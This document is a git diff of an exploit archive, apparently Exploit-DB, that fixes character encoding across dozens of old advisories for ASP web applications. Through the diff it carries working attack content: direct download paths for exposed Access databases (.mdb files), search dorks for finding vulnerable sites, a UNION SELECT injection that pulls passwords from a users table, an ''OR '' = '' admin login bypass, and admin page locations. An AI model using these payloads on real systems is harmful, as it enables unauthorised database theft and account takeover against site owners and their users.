Free Forum Software - Free Bulletin Board Software ] - [] Download: [ http://www.webwizguide.com/webwizforums/webwizforums_downloads.asp ] - [] Founder: [ ViRuSMaN ] - [] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ] - [] My Home: [ HackTeach.Org , Islam-Attack.Com ] - [] Dork: [ Web Wiz Forums version 9.64 [Free Express Edition] ] + [»] Script: [ Web Wiz Forums v9.64 ] + [»] Language: [ ASP ] + [»] Site page: [ Web Wiz Forums - Free Forum Software - Free Bulletin Board Software ] + [»] Download: [ http://www.webwizguide.com/webwizforums/webwizforums_downloads.asp ] + [»] Founder: [ ViRuSMaN ] + [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ] + [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] + [»] Dork: [ Web Wiz Forums® version 9.64 [Free Express Edition] ] ########################################################################### ===[ Exploit ]=== - [] http://[target].com/[path]/database/wwForum.mdb + [»] http://[target].com/[path]/database/wwForum.mdb Author: ViRuSMaN <- diff --git a/platforms/asp/webapps/10639.txt b/platforms/asp/webapps/10639.txt index f65759e15..5a51a39da 100755 --- a/platforms/asp/webapps/10639.txt +++ b/platforms/asp/webapps/10639.txt @@ -7,24 +7,24 @@ ============================================================================== - [] ~ Note : if the path of "snitz_forums_2000.mdb" has been changed this exploit will not work + [»] ~ Note : if the path of "snitz_forums_2000.mdb" has been changed this exploit will not work ============================================================================== - [] Snitz Forums 2000 Remote Database Disclosure Vulnerability + [»] Snitz Forums 2000 Remote Database Disclosure Vulnerability ============================================================================== - [] Script: [ Snitz Forums ] - [] Language: [ ASP ] - [] Site page: [ Snitz Forums 2000 - free ASP-based Internet Discussion Forum Software ] - [] Download: [ http://forum.snitz.com/specs.asp ] - [] Founder: [ ViRuSMaN ] - [] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ] - [] My Home: [ HackTeach.Org , Islam-Attack.Com ] + [»] Script: [ Snitz Forums ] + [»] Language: [ ASP ] + [»] Site page: [ Snitz Forums 2000 - free ASP-based Internet Discussion Forum Software ] + [»] Download: [ http://forum.snitz.com/specs.asp ] + [»] Founder: [ ViRuSMaN ] + [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ] + [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== - [] http://[target].com/[path]/snitz_forums_2000.mdb + [»] http://[target].com/[path]/snitz_forums_2000.mdb Author: ViRuSMaN <- diff --git a/platforms/asp/webapps/10767.txt b/platforms/asp/webapps/10767.txt index 2c646193a..bad2332a1 100755 --- a/platforms/asp/webapps/10767.txt +++ b/platforms/asp/webapps/10767.txt @@ -5,7 +5,7 @@ | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : jgbbs-3.0 beta 1 | -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | +| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : DB | ====================== Exploit By indoushka ================================= | # Exploit : diff --git a/platforms/asp/webapps/10770.txt b/platforms/asp/webapps/10770.txt index 150f5662d..a26667f4b 100755 --- a/platforms/asp/webapps/10770.txt +++ b/platforms/asp/webapps/10770.txt @@ -5,7 +5,7 @@ | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : PSnews - Copyright (C) 2003 Rich Kavanagh | -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | +| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : DB | ====================== Exploit By indoushka ================================= | # Exploit : diff --git a/platforms/asp/webapps/10771.txt b/platforms/asp/webapps/10771.txt index ab82e2738..7a5eb48e2 100755 --- a/platforms/asp/webapps/10771.txt +++ b/platforms/asp/webapps/10771.txt @@ -4,7 +4,7 @@ | # email : indoushka@hotmail.com | | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | +| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : SQL Injection | ====================== Exploit By indoushka ================================= | # Exploit : diff --git a/platforms/asp/webapps/10772.txt b/platforms/asp/webapps/10772.txt index 58eb033f5..5c97e755d 100755 --- a/platforms/asp/webapps/10772.txt +++ b/platforms/asp/webapps/10772.txt @@ -5,7 +5,7 @@ | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : [ AspBB ] - Active Server Page Bulletin Board | -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | +| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : DB | ====================== Exploit By indoushka ================================= | # Exploit : diff --git a/platforms/asp/webapps/10773.txt b/platforms/asp/webapps/10773.txt index 6b95881df..b508cd9ca 100755 --- a/platforms/asp/webapps/10773.txt +++ b/platforms/asp/webapps/10773.txt @@ -5,7 +5,7 @@ | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : Futility Forum 1.0 Revamp | -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | +| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : DB | ====================== Exploit By indoushka ================================= | # Exploit : diff --git a/platforms/asp/webapps/10774.txt b/platforms/asp/webapps/10774.txt index 18b95fab3..462af1b50 100755 --- a/platforms/asp/webapps/10774.txt +++ b/platforms/asp/webapps/10774.txt @@ -5,7 +5,7 @@ | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : htmlArea v2.03 | -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | +| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : DB | ====================== Exploit By indoushka ================================= | # Exploit : diff --git a/platforms/asp/webapps/10775.txt b/platforms/asp/webapps/10775.txt index 7cfd2189c..25e3c284b 100755 --- a/platforms/asp/webapps/10775.txt +++ b/platforms/asp/webapps/10775.txt @@ -5,7 +5,7 @@ | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : Uguestbook !talian script | -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | +| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : DB | ====================== Exploit By indoushka ================================= | # Exploit : diff --git a/platforms/asp/webapps/10776.txt b/platforms/asp/webapps/10776.txt index ae925abb5..19c235991 100755 --- a/platforms/asp/webapps/10776.txt +++ b/platforms/asp/webapps/10776.txt @@ -5,7 +5,7 @@ | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : BaalASP 2.0 | -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | +| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : DB | ====================== Exploit By indoushka ================================= | # Exploit : diff --git a/platforms/asp/webapps/10777.txt b/platforms/asp/webapps/10777.txt index c8b33c7d7..1ac678538 100755 --- a/platforms/asp/webapps/10777.txt +++ b/platforms/asp/webapps/10777.txt @@ -5,7 +5,7 @@ | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : FULLY FUNCTIONAL ASP FORUM - MtMWebForum 1.0 | -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | +| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : DB | ====================== Exploit By indoushka ================================= | # Exploit : diff --git a/platforms/asp/webapps/10778.txt b/platforms/asp/webapps/10778.txt index 6a4c15109..eef4a1927 100755 --- a/platforms/asp/webapps/10778.txt +++ b/platforms/asp/webapps/10778.txt @@ -5,7 +5,7 @@ | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : makit news/blog poster v3.1 | -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | +| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : DB | ====================== Exploit By indoushka ================================= | # Exploit : diff --git a/platforms/asp/webapps/10780.txt b/platforms/asp/webapps/10780.txt index 688a64b8c..f191a87ca 100755 --- a/platforms/asp/webapps/10780.txt +++ b/platforms/asp/webapps/10780.txt @@ -5,7 +5,7 @@ | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : Battle Blog | -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | +| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : DB | ====================== Exploit By indoushka ================================= | # Exploit : diff --git a/platforms/asp/webapps/10823.txt b/platforms/asp/webapps/10823.txt index b02b6ce31..a921449e6 100755 --- a/platforms/asp/webapps/10823.txt +++ b/platforms/asp/webapps/10823.txt @@ -16,27 +16,27 @@ ============================================================================== - [] ~ Note : Mutlu Yillar Millettt + [»] ~ Note : Mutlu Yillar Millettt ============================================================================== - []UranyumSoft lan Servisi Database Disclosure Vulnerability + [»]UranyumSoft Ýlan Servisi Database Disclosure Vulnerability ============================================================================== - [] Script: [ UranyumSoft lan Servisi ] + [»] Script: [ UranyumSoft Ýlan Servisi ] - [] Language: [ ASP ] + [»] Language: [ ASP ] - [] Download: [ http://aspindir.com/Goster/5420] + [»] Download: [ http://aspindir.com/Goster/5420] - [] Founder: [ LionTurk - Bylionturk@kafam1milyon.com } + [»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com } - [] My Home: [ RevengeHack.com ] + [»] My Home: [ RevengeHack.com ] - []N0T3 : Yeni Aciklarimi Bekleyin. + [»]N0T3 : Yeni Aciklarimi Bekleyin. ########################################################################### @@ -47,14 +47,14 @@ - [] http://server/[dizin]/database/db.mdb + [»] http://server/[dizin]/database/db.mdb - [] Copyright 2008 UranyumSoft.com | Tm haklar sakldr. + [»] Copyright 2008 UranyumSoft.com | Tüm haklarý saklýdýr. - [] Admin Page: /yetki.asp + [»] Admin Page: /yetki.asp diff --git a/platforms/asp/webapps/10883.txt b/platforms/asp/webapps/10883.txt index 3b543e354..e94c0227a 100755 --- a/platforms/asp/webapps/10883.txt +++ b/platforms/asp/webapps/10883.txt @@ -16,27 +16,27 @@ ============================================================================== - [] ~ Note : Mutlu Yillar Millettt + [»] ~ Note : Mutlu Yillar Millettt ============================================================================== - [] BlogWorx Blog Database Disclosure Vulnerability + [»] BlogWorx Blog Database Disclosure Vulnerability ============================================================================== - [] Script: [ BlogWorx Blog ] + [»] Script: [ BlogWorx Blog ] - [] Language: [ ASP ] + [»] Language: [ ASP ] - [] Download: [ http://devworx.somee.com/] + [»] Download: [ http://devworx.somee.com/] - [] Founder: [ LionTurk - Bylionturk@kafam1milyon.com } + [»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com } - [] My Home: [ RevengeHack.com ] + [»] My Home: [ RevengeHack.com ] - []N0T3 : Yeni Aciklarimi Bekleyin. + [»]N0T3 : Yeni Aciklarimi Bekleyin. ########################################################################### @@ -47,11 +47,11 @@ - [] http://server/db/users.mdb Or db/teadmin.mdb + [»] http://server/db/users.mdb Or db/teadmin.mdb - [] 2008 devworx - devworx.somee.com + [»] © 2008 devworx - devworx.somee.com diff --git a/platforms/asp/webapps/10903.txt b/platforms/asp/webapps/10903.txt index 8df4c82e5..28c08f9c9 100755 --- a/platforms/asp/webapps/10903.txt +++ b/platforms/asp/webapps/10903.txt @@ -16,27 +16,27 @@ ============================================================================== - [] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi + [»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi ============================================================================== - []Mini-NUKE v2.3 Freehost Multi Vulnerability + [»]Mini-NUKE v2.3 Freehost Multi Vulnerability ============================================================================== - [] Script: [ Mini-NUKE v2.3 Freehost ] + [»] Script: [ Mini-NUKE v2.3 Freehost ] - [] Language: [ ASP ] + [»] Language: [ ASP ] - [] Download: [ http://aspindir.com/Goster/3543] + [»] Download: [ http://aspindir.com/Goster/3543] - [] Founder: [ LionTurk - Bylionturk@kafam1milyon.com } + [»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com } - [] My Home: [ RevengeHack.com and Ar-ge.Org ] + [»] My Home: [ RevengeHack.com and Ar-ge.Org ] - []N0T3 : Yeni Aciklarimi Bekleyin. + [»]N0T3 : Yeni Aciklarimi Bekleyin. ########################################################################### @@ -47,15 +47,15 @@ - [] http://server/db/mn7O4Z6J7L5W.mdb + [»] http://server/db/mn7O4Z6J7L5W.mdb - [] http://server/setup.asp + [»] http://server/setup.asp - [] bu site motoru copyright 2004 mini-nuke v2.3 kullanlarak hazrlanmtr + [»] bu site motoru copyright © 2004 mini-nuke v2.3 kullanýlarak hazýrlanmýþtýr diff --git a/platforms/asp/webapps/10940.txt b/platforms/asp/webapps/10940.txt index 599975f8d..91faa85c8 100755 --- a/platforms/asp/webapps/10940.txt +++ b/platforms/asp/webapps/10940.txt @@ -16,27 +16,27 @@ ============================================================================== - [] ~ Note : Baska Biri Bulduysa Affettsin :D + [»] ~ Note : Baska Biri Bulduysa Affettsin :D ============================================================================== - []Football Pool v3.1 Database Disclosure Vulnerability + [»]Football Pool v3.1 Database Disclosure Vulnerability ============================================================================== - [] Script: [ Football Pool v3.1 ] + [»] Script: [ Football Pool v3.1 ] - [] Language: [ ASP ] + [»] Language: [ ASP ] - [] Download: [ http://aspindir.com/Goster/742] + [»] Download: [ http://aspindir.com/Goster/742] - [] Founder: [ LionTurk - Bylionturk@kafam1milyon.com } + [»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com } - [] My Home: [ RevengeHack.com ] + [»] My Home: [ RevengeHack.com ] - []N0T3 : Yeni Aciklarimi Bekleyin. + [»]N0T3 : Yeni Aciklarimi Bekleyin. ########################################################################### @@ -47,14 +47,14 @@ - [] http://revengehack.com/[dizin]/data/NFL.mdb + [»] http://revengehack.com/[dizin]/data/NFL.mdb - [] asp football pool v3.1 1999-2009 by mike hall. or 2009 Football Pool + [»] asp football pool v3.1 © 1999-2009 by mike hall. or 2009 Football Pool - [] Admin Page: /userLogin.asp + [»] Admin Page: /userLogin.asp diff --git a/platforms/asp/webapps/10955.txt b/platforms/asp/webapps/10955.txt index 720d3ca36..49e288a15 100755 --- a/platforms/asp/webapps/10955.txt +++ b/platforms/asp/webapps/10955.txt @@ -22,9 +22,9 @@ ===[ Exploit SQL ]=== -[]SQL : [Path]/details&newsID=[inj3ct C0dE] +[ª]SQL : [Path]/details&newsID=[inj3ct C0dE] -[]dem0: +[ª]dem0: http://www.site.com/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users diff --git a/platforms/asp/webapps/10972.txt b/platforms/asp/webapps/10972.txt index 8ae513327..4a3652bfa 100755 --- a/platforms/asp/webapps/10972.txt +++ b/platforms/asp/webapps/10972.txt @@ -16,27 +16,27 @@ ============================================================================== - [] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi + [»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi ============================================================================== - []Acidcat CMS v 3.5 Multi Vulnerability + [»]Acidcat CMS v 3.5 Multi Vulnerability ============================================================================== - [] Script: [ Mini-NUKE v2.3 Freehost ] + [»] Script: [ Mini-NUKE v2.3 Freehost ] - [] Language: [ ASP ] + [»] Language: [ ASP ] - [] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free] + [»] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free] - [] Founder: [ LionTurk - Bylionturk@kafam1milyon.com } + [»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com } - [] My Home: [ RevengeHack.com and Ar-ge.Org ] + [»] My Home: [ RevengeHack.com and Ar-ge.Org ] - []N0T3 : Yeni Aciklarimi Bekleyin. + [»]N0T3 : Yeni Aciklarimi Bekleyin. ########################################################################### @@ -47,15 +47,15 @@ - [] http://server/[dizin]/databases/acidcat_3.mdb + [»] http://server/[dizin]/databases/acidcat_3.mdb - [] http://server/[dizin]/install.asp + [»] http://server/[dizin]/install.asp - [] Powered by Acidcat CMS v 3.5.1.f + [»] Powered by Acidcat CMS v 3.5.1.f diff --git a/platforms/asp/webapps/11005.txt b/platforms/asp/webapps/11005.txt index cb2b4a389..6920518b9 100755 --- a/platforms/asp/webapps/11005.txt +++ b/platforms/asp/webapps/11005.txt @@ -16,27 +16,27 @@ ============================================================================== - [] ~ Note : Mutlu Yillar Millettt + [»] ~ Note : Mutlu Yillar Millettt ============================================================================== - []KMSoft Guestbook v 1.0 Database Disclosure Vulnerability + [»]KMSoft Guestbook v 1.0 Database Disclosure Vulnerability ============================================================================== - [] Script: [ KMSoft Guestbook v 1.0 ] + [»] Script: [ KMSoft Guestbook v 1.0 ] - [] Language: [ ASP ] + [»] Language: [ ASP ] - [] Download: [ http://kmsoft.org] + [»] Download: [ http://kmsoft.org] - [] Founder: [ LionTurk - Bylionturk@kafam1milyon.com } + [»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com } - [] My Home: [ RevengeHack.com & Ar-ge.Org] + [»] My Home: [ RevengeHack.com & Ar-ge.Org] - []N0T3 : Yeni Aciklarimi Bekleyin. + [»]N0T3 : Yeni Aciklarimi Bekleyin. ########################################################################### @@ -47,14 +47,14 @@ - [] http://server/[dizin]/db/db.mdb + [»] http://server/[dizin]/db/db.mdb - [] KMSoft Guestbook v 1.0 Powered by KMSoft or Powered by KMSoft + [»] KMSoft Guestbook v 1.0 Powered by KMSoft or Powered by KMSoft - [] Admin Page: /admin + [»] Admin Page: /admin @@ -64,7 +64,7 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng Ar-ge.Org :Cyber_945,D3xer -- Kritik Benim,Kritigi Ben Bellerim,Kzdrmayn Benim Alayinizi Keserim +- Kritik Benim,Kritigi Ben Bellerim,Kýzdýrmayýn Benim Alayinizi Keserim - Ben Ne Heykirlar Gordum site heyklicek exploiti yok.Ben Ne exploitler gordum kullancak heykir yok :D diff --git a/platforms/asp/webapps/11008.txt b/platforms/asp/webapps/11008.txt index 8c826683e..bef170365 100755 --- a/platforms/asp/webapps/11008.txt +++ b/platforms/asp/webapps/11008.txt @@ -6,7 +6,7 @@ | # DAte : 16/12/2009 | # Web Site : www.iq-ty.com | # Script : Powered by YP Portal MS-Pro -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) IIS 5.0 +| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0 | # Bug : DB ====================== Exploit By indoushka ================================= # Exploit : diff --git a/platforms/asp/webapps/11015.txt b/platforms/asp/webapps/11015.txt index 082b23e85..27ee24d0c 100755 --- a/platforms/asp/webapps/11015.txt +++ b/platforms/asp/webapps/11015.txt @@ -6,7 +6,7 @@ | # Web Site : www.iq-ty.com | # Dork : Lebi soft Ziyaretci Defteri_v7.5 | # Script : (VP-ASP Shopping Cart 7.0) Copyright (c) 1999-2010 Rocksalt International. -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) IIS 5.0 +| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0 | # Bug : DB ====================== Exploit By indoushka ================================= | # Exploit : diff --git a/platforms/asp/webapps/11016.txt b/platforms/asp/webapps/11016.txt index 214185e33..a145f656d 100755 --- a/platforms/asp/webapps/11016.txt +++ b/platforms/asp/webapps/11016.txt @@ -6,7 +6,7 @@ | # Web Site : www.iq-ty.com | # Dork : netGitar.com - Shop v1.0 | # Script : (VP-ASP Shopping Cart 7.0) Copyright (c) 1999-2010 Rocksalt International. -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) IIS 5.0 +| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0 | # Bug : DB ====================== Exploit By indoushka ================================= | # Exploit : diff --git a/platforms/asp/webapps/11018.txt b/platforms/asp/webapps/11018.txt index f211a458d..96953769f 100755 --- a/platforms/asp/webapps/11018.txt +++ b/platforms/asp/webapps/11018.txt @@ -7,7 +7,7 @@ | # Dork : Copyright 1999-2010 Rocksalt International Pty Ltd. All rights reserved | # Dork1 : VP-ASP Shopping Cart 7.0 | # Script : (VP-ASP Shopping Cart 7.0) Copyright (c) 1999-2010 Rocksalt International. -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) IIS 5.0 +| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0 | # Bug : DB ====================== Exploit By indoushka ================================= # Exploit : diff --git a/platforms/asp/webapps/11023.txt b/platforms/asp/webapps/11023.txt index f2208c45e..a389333ce 100755 --- a/platforms/asp/webapps/11023.txt +++ b/platforms/asp/webapps/11023.txt @@ -1,26 +1,26 @@ ============================================================================== - [] ~ Note : Mutlu Yillar Millettt + [»] ~ Note : Mutlu Yillar Millettt ============================================================================== - [] Erolife AjxGaleri VT Database Disclosure Vulnerability + [»] Erolife AjxGaleri VT Database Disclosure Vulnerability ============================================================================== - [] Script: [ Erolife AjxGaleri VT ] + [»] Script: [ Erolife AjxGaleri VT ] - [] Language: [ ASP ] + [»] Language: [ ASP ] - [] Download: [ http://www.aspindir.com/goster/4322] + [»] Download: [ http://www.aspindir.com/goster/4322] - [] Founder: [ LionTurk - Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com } + [»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com } - [] My Home: [ RevengeHack.com & Ar-ge.Org ] + [»] My Home: [ RevengeHack.com & Ar-ge.Org ] - []N0T3 : Yeni Aciklarimi Bekleyin. + [»]N0T3 : Yeni Aciklarimi Bekleyin. ########################################################################### @@ -31,4 +31,4 @@ - [] http://localhost/path/db/ajxgaleri.mdb \ No newline at end of file + [»] http://localhost/path/db/ajxgaleri.mdb \ No newline at end of file diff --git a/platforms/asp/webapps/11096.txt b/platforms/asp/webapps/11096.txt index 90a3b56bc..4c6442af6 100755 --- a/platforms/asp/webapps/11096.txt +++ b/platforms/asp/webapps/11096.txt @@ -7,26 +7,26 @@ ============================================================================== - [] ABB v1.1 Forum Remote Database Disclosure Vulnerability + [»] ABB v1.1 Forum Remote Database Disclosure Vulnerability ============================================================================== - [] Script: [ ABB Forums ] - [] Language: [ ASP ] - [] Site page: [ Possede de tres nombreuses options d administration et de configuration ] - [] Founder: [ ViRuSMaN ] - [] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] - [] My Home: [ HackTeach.Org , Islam-Attack.Com ] + [»] Script: [ ABB Forums ] + [»] Language: [ ASP ] + [»] Site page: [ Possede de tres nombreuses options d administration et de configuration ] + [»] Founder: [ ViRuSMaN ] + [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] + [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== - [] http://server/[path]/fpdb/abb.mdb + [»] http://server/[path]/fpdb/abb.mdb ===[ Admin Login ]=== - [] http://server/[path]/admin.asp + [»] http://server/[path]/admin.asp Author: ViRuSMaN <- diff --git a/platforms/asp/webapps/11097.txt b/platforms/asp/webapps/11097.txt index 39e290ce3..1028339b8 100755 --- a/platforms/asp/webapps/11097.txt +++ b/platforms/asp/webapps/11097.txt @@ -11,27 +11,27 @@ ======================================================================== ====== - [] ~ Note : [ Tribute to the martyrs of Gaza . ] + [»] ~ Note : [ Tribute to the martyrs of Gaza . ] ======================================================================== ====== - [] Egreetings v1.0 b Remote Database Disclosure Vulnerability + [»] Egreetings v1.0 b Remote Database Disclosure Vulnerability ======================================================================== ====== - [] Script: [ Egreetings ] - [] Language: [ ASP ] - [] Site page: [ Systeme d envoie de cartes de voeux ] - [] Founder: [ ViRuSMaN ] - [] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] - [] My Home: [ HackTeach.Org , Islam-Attack.Com ] + [»] Script: [ Egreetings ] + [»] Language: [ ASP ] + [»] Site page: [ Systeme d envoie de cartes de voeux ] + [»] Founder: [ ViRuSMaN ] + [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] + [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== - [] http://server/[path]/kort.mdb + [»] http://server/[path]/kort.mdb Author: ViRuSMaN <- diff --git a/platforms/asp/webapps/11098.txt b/platforms/asp/webapps/11098.txt index a9365dd0d..c9bac4749 100755 --- a/platforms/asp/webapps/11098.txt +++ b/platforms/asp/webapps/11098.txt @@ -7,21 +7,21 @@ ============================================================================== - [] E-membres v1.0 Remote Database Disclosure Vulnerability + [»] E-membres v1.0 Remote Database Disclosure Vulnerability ============================================================================== - [] Script: [ E-membres ] - [] Language: [ ASP ] - [] Site page: [ Elle contient la partie d administration des membres ] - [] Founder: [ ViRuSMaN ] - [] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] - [] My Home: [ HackTeach.Org , Islam-Attack.Com ] + [»] Script: [ E-membres ] + [»] Language: [ ASP ] + [»] Site page: [ Elle contient la partie d administration des membres ] + [»] Founder: [ ViRuSMaN ] + [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] + [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== - [] http://server/[path]/db/bdEMembres.mdb + [»] http://server/[path]/db/bdEMembres.mdb Author: ViRuSMaN <- diff --git a/platforms/asp/webapps/11295.txt b/platforms/asp/webapps/11295.txt index 10ce8148a..1e0d0f617 100755 --- a/platforms/asp/webapps/11295.txt +++ b/platforms/asp/webapps/11295.txt @@ -11,7 +11,7 @@ Arbitrary File Upload



-

+ 

diff --git a/platforms/asp/webapps/11361.txt b/platforms/asp/webapps/11361.txt index daaa229e5..884b7ec88 100755 --- a/platforms/asp/webapps/11361.txt +++ b/platforms/asp/webapps/11361.txt @@ -1,16 +1,16 @@ ============================================================================== - [] fipsForum v2.6 Remote Database Disclosure Vulnerability + [»] fipsForum v2.6 Remote Database Disclosure Vulnerability ============================================================================== - [] Script: [ fipsForum ] - [] Language: [ ASP ] - [] Site page: [ fipsForum is a simple and easy to use Forum System with a MS Access database. ] - [] Founder: [ ViRuSMaN ] - [] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] - [] My Home: [ HackTeach.Org , Islam-Attack.Com ] + [»] Script: [ fipsForum ] + [»] Language: [ ASP ] + [»] Site page: [ fipsForum is a simple and easy to use Forum System with a MS Access database. ] + [»] Founder: [ ViRuSMaN ] + [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] + [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== - [] http://server/[path]/_database/forumFips.mdb \ No newline at end of file + [»] http://server/[path]/_database/forumFips.mdb \ No newline at end of file diff --git a/platforms/asp/webapps/11606.txt b/platforms/asp/webapps/11606.txt index c1834d418..af9a8c896 100755 --- a/platforms/asp/webapps/11606.txt +++ b/platforms/asp/webapps/11606.txt @@ -26,7 +26,7 @@ # # http://site/admin/index.asp # -# Anvndarnamn(Username) : 'OR '' = ' -# Lsenord(password) : 'OR '' = ' +# Användarnamn(Username) : 'OR '' = ' +# Lösenord(password) : 'OR '' = ' # ################################################################################################ \ No newline at end of file diff --git a/platforms/asp/webapps/11611.txt b/platforms/asp/webapps/11611.txt index 096e27c3c..cef52d949 100755 --- a/platforms/asp/webapps/11611.txt +++ b/platforms/asp/webapps/11611.txt @@ -4,7 +4,7 @@ | # email : indoushka@hotmail.com | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | # Web Site : http://scripti.org/i/ucuzalsat.zip -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) IIS 5.1 +| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.1 | # Bug : ASP DB Download ====================== Exploit By indoushka ================================= # Exploit : diff --git a/platforms/asp/webapps/12218.txt b/platforms/asp/webapps/12218.txt index 0374aa9c4..c170fcf2f 100755 --- a/platforms/asp/webapps/12218.txt +++ b/platforms/asp/webapps/12218.txt @@ -4,7 +4,7 @@ | # email : indoushka@hotmail.com | # Home : www.iqs3cur1ty.com/vb | # Web Site : http://dl.p30vel.ir/scripts/smans(www.p30vel.ir){a.allahparast}.zip -| # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) +| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix 